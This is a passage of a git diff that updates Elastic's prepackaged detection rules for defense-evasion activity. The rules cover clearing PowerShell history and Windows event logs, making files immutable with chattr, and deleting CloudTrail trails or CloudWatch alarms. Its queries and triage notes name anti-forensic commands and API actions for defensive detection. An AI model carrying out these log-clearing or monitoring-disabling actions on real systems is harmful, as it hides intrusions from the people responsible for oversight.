- "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_base16_or_base32_encoding_or_decoding_activity.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_base16_or_base32_encoding_or_decoding_activity.json index 1cc353f1add3a..b71a2e82ba198 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_base16_or_base32_encoding_or_decoding_activity.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_base16_or_base32_encoding_or_decoding_activity.json @@ -15,6 +15,23 @@ "license": "Elastic License v2", "name": "Base16 or Base32 Encoding/Decoding Activity", "query": "event.category:process and event.type:(start or process_started) and\n process.name:(base16 or base32 or base32plain or base32hex)\n", + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "debff20a-46bc-4a4d-bae5-5cdd14222795", "severity": "low", @@ -49,5 +66,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 7 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_chattr_immutable_file.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_chattr_immutable_file.json new file mode 100644 index 0000000000000..970589b6bd209 --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_chattr_immutable_file.json @@ -0,0 +1,82 @@ +{ + "author": [ + "Elastic" + ], + "description": "Detects a file being made immutable using the chattr binary. Making a file immutable means it cannot be deleted or renamed, no link can be created to this file, most of the file's metadata can not be modified, and the file can not be opened in write mode. Threat actors will commonly utilize this to prevent tampering or modification of their malicious files or any system files they have modified for purposes of persistence (e.g .ssh, /etc/passwd, etc.).", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "max_signals": 33, + "name": "File made Immutable by Chattr", + "note": "", + "query": "process where event.type == \"start\" and user.name == \"root\" and process.executable : \"/usr/bin/chattr\" and process.args : (\"-*i*\", \"+*i*\") and not process.parent.executable: \"/lib/systemd/systemd\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "968ccab9-da51-4a87-9ce2-d3c9782fd759", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "severity": "medium", + "tags": [ + "Elastic", + "Host", + "Linux", + "Threat Detection", + "Defense Evasion" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1222", + "name": "File and Directory Permissions Modification", + "reference": "https://attack.mitre.org/techniques/T1222/", + "subtechnique": [ + { + "id": "T1222.002", + "name": "Linux and Mac File and Directory Permissions Modification", + "reference": "https://attack.mitre.org/techniques/T1222/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_clearing_windows_console_history.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_clearing_windows_console_history.json index 28958ec2d724f..93b4478f846a0 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_clearing_windows_console_history.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_clearing_windows_console_history.json @@ -12,15 +12,38 @@ "language": "eql", "license": "Elastic License v2", "name": "Clearing Windows Console History", - "note": "## Triage and analysis\n\n### Investigating Clearing Windows Console History\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This\nmakes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can try to cover their tracks by clearing PowerShell console history. PowerShell has two different ways of\nlogging commands: the built-in history and the command history managed by the PSReadLine module. This rule looks for the\nexecution of commands that can clear the built-in PowerShell logs or delete the `ConsoleHost_history.txt` file.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - Verify if any other anti-forensics behaviors were observed.\n- Investigate the PowerShell logs on the SIEM to determine if there was suspicious behavior that an attacker may be\ntrying to cover up.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n - Ensure that PowerShell auditing policies and log collection are in place to grant future visibility.\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Clearing Windows Console History\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This\nmakes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can try to cover their tracks by clearing PowerShell console history. PowerShell has two different ways of\nlogging commands: the built-in history and the command history managed by the PSReadLine module. This rule looks for the\nexecution of commands that can clear the built-in PowerShell logs or delete the `ConsoleHost_history.txt` file.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - Verify if any other anti-forensics behaviors were observed.\n- Investigate the PowerShell logs on the SIEM to determine if there was suspicious behavior that an attacker may be\ntrying to cover up.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n - Ensure that PowerShell auditing policies and log collection are in place to grant future visibility.", "query": "process where event.action == \"start\" and\n (process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") or process.pe.original_file_name == \"PowerShell.EXE\") and\n (process.args : \"*Clear-History*\" or\n (process.args : (\"*Remove-Item*\", \"rm\") and process.args : (\"*ConsoleHost_history.txt*\", \"*(Get-PSReadlineOption).HistorySavePath*\")) or\n (process.args : \"*Set-PSReadlineOption*\" and process.args : \"*SaveNothing*\"))\n", "references": [ "https://stefanos.cloud/kb/how-to-clear-the-powershell-command-history/", "https://www.shellhacks.com/clear-history-powershell/", "https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics" ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "b5877334-677f-4fb9-86d5-a9721274223b", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -55,5 +78,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_clearing_windows_event_logs.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_clearing_windows_event_logs.json index ce68ce01ae29b..b433b81e0c732 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_clearing_windows_event_logs.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_clearing_windows_event_logs.json @@ -12,10 +12,33 @@ "language": "eql", "license": "Elastic License v2", "name": "Clearing Windows Event Logs", - "note": "## Triage and analysis\n\n### Investigating Clearing Windows Event Logs\n\nWindows event logs are a fundamental data source for security monitoring, forensics, and incident response. Adversaries\ncan tamper, clear, and delete this data to break SIEM detections, cover their tracks, and slow down incident response.\n\nThis rule looks for the execution of the `wevtutil.exe` utility or the `Clear-EventLog` cmdlet to clear event logs.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - Verify if any other anti-forensics behaviors were observed.\n- Investigate the event logs prior to the action for suspicious behaviors that an attacker may be trying to cover up.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity\nand there are justifications for this action.\n- Analyze whether the cleared event log is pertinent to security and general monitoring. Administrators can clear\nnon-relevant event logs using this mechanism. If this activity is expected and noisy in your environment, consider\nadding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - This activity is potentially done after the adversary achieves its objectives on the host. Ensure that previous\n actions, if any, are investigated accordingly with their response playbooks.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Clearing Windows Event Logs\n\nWindows event logs are a fundamental data source for security monitoring, forensics, and incident response. Adversaries\ncan tamper, clear, and delete this data to break SIEM detections, cover their tracks, and slow down incident response.\n\nThis rule looks for the execution of the `wevtutil.exe` utility or the `Clear-EventLog` cmdlet to clear event logs.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - Verify if any other anti-forensics behaviors were observed.\n- Investigate the event logs prior to the action for suspicious behaviors that an attacker may be trying to cover up.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity\nand there are justifications for this action.\n- Analyze whether the cleared event log is pertinent to security and general monitoring. Administrators can clear\nnon-relevant event logs using this mechanism. If this activity is expected and noisy in your environment, consider\nadding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - This activity is potentially done after the adversary achieves its objectives on the host. Ensure that previous\n actions, if any, are investigated accordingly with their response playbooks.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"process_started\", \"start\") and\n (process.name : \"wevtutil.exe\" or process.pe.original_file_name == \"wevtutil.exe\") and\n process.args : (\"/e:false\", \"cl\", \"clear-log\") or\n process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and process.args : \"Clear-EventLog\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "d331bbe2-6db4-4941-80a5-8270db72eb61", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -50,5 +73,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 13 + "version": 15 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_clearing_windows_security_logs.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_clearing_windows_security_logs.json index 3989ceed2bab9..8bef83a974832 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_clearing_windows_security_logs.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_clearing_windows_security_logs.json @@ -14,6 +14,13 @@ "name": "Windows Event Logs Cleared", "note": "## Triage and analysis\n\n### Investigating Windows Event Logs Cleared\n\nWindows event logs are a fundamental data source for security monitoring, forensics, and incident response. Adversaries\ncan tamper, clear, and delete this data to break SIEM detections, cover their tracks, and slow down incident response.\n\nThis rule looks for the occurrence of clear actions on the `security` event log.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - Verify if any other anti-forensics behaviors were observed.\n- Investigate the event logs prior to the action for suspicious behaviors that an attacker may be trying to cover up.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - This activity is potentially done after the adversary achieves its objectives on the host. Ensure that previous\n actions, if any, are investigated accordingly with their response playbooks.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n", "query": "event.action:(\"audit-log-cleared\" or \"Log clear\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "45ac4800-840f-414c-b221-53dd36a5aaf7", "severity": "low", @@ -50,5 +57,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 4 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_cloudtrail_logging_deleted.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_cloudtrail_logging_deleted.json index cc131b5236a62..6c3e7cde8f6d2 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_cloudtrail_logging_deleted.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_cloudtrail_logging_deleted.json @@ -15,14 +15,44 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS CloudTrail Log Deleted", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "## Triage and analysis\n\n### Investigating AWS CloudTrail Log Deleted\n\nAmazon CloudTrail is a service that enables governance, compliance, operational auditing, and risk auditing of your\nAmazon Web Services account. With CloudTrail, you can log, continuously monitor, and retain account activity related to\nactions across your Amazon Web Services infrastructure. CloudTrail provides event history of your Amazon Web Services\naccount activity, including actions taken through the Amazon Management Console, Amazon SDKs, command line tools, and\nother Amazon Web Services services. This event history simplifies security analysis, resource change tracking, and\ntroubleshooting.\n\nThis rule identifies the deletion of an AWS log trail using the API `DeleteTrail` action. Attackers can do this to\ncover their tracks and impact security monitoring that relies on this source.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Contact the account and resource owners and confirm whether they are aware of this activity.\n- Check if this operation was approved and performed according to the organization's change management policy.\n- Considering the source IP address and geolocation of the user who issued the command:\n - Do they look normal for the user?\n - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source\n IP from an EC2 instance that's not under your control?\n - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles?\n Are there any other alerts or signs of suspicious activity involving this instance?\n- Investigate the deleted log trail's criticality and whether the responsible team is aware of the deletion.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a\ncombination of user and IP address conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Take the actions needed to return affected systems, data, or services to their normal operational levels.\n- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "event.dataset:aws.cloudtrail and event.provider:cloudtrail.amazonaws.com and event.action:DeleteTrail and event.outcome:success\n", "references": [ "https://docs.aws.amazon.com/awscloudtrail/latest/APIReference/API_DeleteTrail.html", "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/cloudtrail/delete-trail.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "7024e2a0-315d-4334-bb1a-441c593e16ab", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -58,5 +88,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_cloudtrail_logging_suspended.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_cloudtrail_logging_suspended.json index 27990a74ac5b2..c3b9963216e67 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_cloudtrail_logging_suspended.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_cloudtrail_logging_suspended.json @@ -15,14 +15,44 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS CloudTrail Log Suspended", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "## Triage and analysis\n\n### Investigating AWS CloudTrail Log Suspended\n\nAmazon CloudTrail is a service that enables governance, compliance, operational auditing, and risk auditing of your\nAmazon Web Services account. With CloudTrail, you can log, continuously monitor, and retain account activity related to\nactions across your Amazon Web Services infrastructure. CloudTrail provides event history of your Amazon Web Services\naccount activity, including actions taken through the Amazon Management Console, Amazon SDKs, command line tools, and\nother Amazon Web Services services. This event history simplifies security analysis, resource change tracking, and\ntroubleshooting.\n\nThis rule identifies the suspension of an AWS log trail using the API `StopLogging` action. Attackers can do this to\ncover their tracks and impact security monitoring that relies on this source.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Contact the account and resource owners and confirm whether they are aware of this activity.\n- Check if this operation was approved and performed according to the organization's change management policy.\n- Considering the source IP address and geolocation of the user who issued the command:\n - Do they look normal for the user?\n - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source\n IP from an EC2 instance that's not under your control?\n - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles?\n Are there any other alerts or signs of suspicious activity involving this instance?\n- Investigate the deleted log trail's criticality and whether the responsible team is aware of the deletion.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a\ncombination of user and IP address conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Take the actions needed to return affected systems, data, or services to their normal operational levels.\n- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "event.dataset:aws.cloudtrail and event.provider:cloudtrail.amazonaws.com and event.action:StopLogging and event.outcome:success\n", "references": [ "https://docs.aws.amazon.com/awscloudtrail/latest/APIReference/API_StopLogging.html", "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/cloudtrail/stop-logging.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "1aa8fa52-44a7-4dae-b058-f3333b91c8d7", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -58,5 +88,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_cloudwatch_alarm_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_cloudwatch_alarm_deletion.json index e188a1ee50c65..7e35d33a173e9 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_cloudwatch_alarm_deletion.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_cloudwatch_alarm_deletion.json @@ -15,14 +15,44 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS CloudWatch Alarm Deletion", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "## Triage and analysis\n\n### Investigating AWS CloudWatch Alarm Deletion\n\nAmazon CloudWatch is a monitoring and observability service that collects monitoring and operational data in the form of\nlogs, metrics, and events for resources and applications. This data can be used to detect anomalous behavior in your environments, set alarms, visualize\nlogs and metrics side by side, take automated actions, troubleshoot issues, and discover insights to keep your\napplications running smoothly.\n\nCloudWatch Alarms is a feature that allows you to watch CloudWatch metrics and to receive notifications when the metrics\nfall outside of the levels (high or low thresholds) that you configure.\n\nThis rule looks for the deletion of a alarm using the API `DeleteAlarms` action. Attackers can do this to cover their\ntracks and evade security defenses.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Contact the account and resource owners and confirm whether they are aware of this activity.\n- Check if there is a justification for this behavior.\n- Considering the source IP address and geolocation of the user who issued the command:\n - Do they look normal for the user?\n - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source\n IP from an EC2 instance that's not under your control?\n - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles?\n Are there any other alerts or signs of suspicious activity involving this instance?\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a\ncombination of user and IP address conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Take the actions needed to return affected systems, data, or services to their normal operational levels.\n- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "event.dataset:aws.cloudtrail and event.provider:monitoring.amazonaws.com and event.action:DeleteAlarms and event.outcome:success\n", "references": [ "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/cloudwatch/delete-alarms.html", "https://docs.aws.amazon.com/AmazonCloudWatch/latest/APIReference/API_DeleteAlarms.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": 